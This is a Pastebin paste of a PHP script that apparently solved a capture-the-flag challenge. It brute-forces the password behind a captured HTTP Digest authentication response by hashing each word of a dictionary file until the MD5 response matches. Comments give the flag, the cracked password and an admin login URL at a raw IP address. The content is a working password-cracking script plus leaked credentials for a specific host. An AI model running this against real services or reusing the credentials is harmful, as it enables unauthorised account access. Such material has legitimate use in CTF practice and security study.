Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //flag: CTF{6ee8014f5cc43767d03d97d6d73d9ed5}
- //pwd: cowboy123
- //InsidePro\ (Full)\ -\ 1.rar <-- wordlist took from http://www.insidepro.com/dictionaries.php
- //log in here with admin:cowboy123: http://54.201.187.163/auth.php
- //down here the script i used to brute digest admin access
- //look wikipedia for its functionality
- ini_set('memory_limit', '-1');
- /*$username="Mufasa";
- $realm="testrealm@host.com";
- $password="";//have to be guessd
- $method="GET";
- $digestURI="/dir/index.html";
- $clientNonce="0a4f113b";
- $nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093";
- $nonceCount="00000001";
- $qop="auth";
- $response="6629fae49393a05397450978507c4ef1";
- */
- $username="admin";
- $realm="Private Area";
- $password="";//have to be guessd
- $method="GET";
- $digestURI="/auth.php";
- $clientNonce="347278e387a2f030";
- $nonce="1389094144";
- $nonceCount="00000001";
- $qop="auth";
- $response="f86930f9e0466aeced34036bc2f7a346";
- //ha1=md5(username:realm:password)
- //ha2=md5(method:digesturi)
- //risposta=md5(ha1:nonce:nonceCount:clientNonce:qop:ha2)
- //$fp=fopen("all3.txt","r");
- //$ha1=md5($username.":".$realm.":".$password);
- //echo md5($ha1.":".$nonce.":".$nonceCount.":".$clientNonce.":".$qop.":".$ha2)."\n";
- $ha2=md5($method.":".$digestURI);
- $lines=file_get_contents("xab");
- $arr=explode("\r\n",$lines);
- for($i=0;$i<count($arr);$i++){
- $password=$arr[$i];
- $ha1=md5($username.":".$realm.":".$password);
- $r=md5($ha1.":".$nonce.":".$nonceCount.":".$clientNonce.":".$qop.":".$ha2);
- if($r==$response){
- die($arr[$i]);
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement